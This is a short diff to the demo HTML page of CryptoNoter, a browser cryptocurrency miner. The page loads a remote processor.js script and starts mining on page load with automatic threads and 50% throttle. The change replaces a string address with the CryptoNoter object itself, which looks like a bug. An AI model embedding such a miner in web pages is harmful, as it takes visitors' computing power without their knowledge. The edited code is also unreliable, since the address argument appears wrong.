--- a/web/demo.html
+++ b/web/demo.html
@@ -19,8 +19,7 @@
 
 	<script src="https://www.cryptonoter.com/processor.js"></script>
 	<script>
-		var addr = 'CryptoNoter';
-		var miner = new CryptoNoter.User(addr, {
+		var miner = new CryptoNoter.User(CryptoNoter, {
 			autoThreads: true,
 			throttle: 0.5
 		});
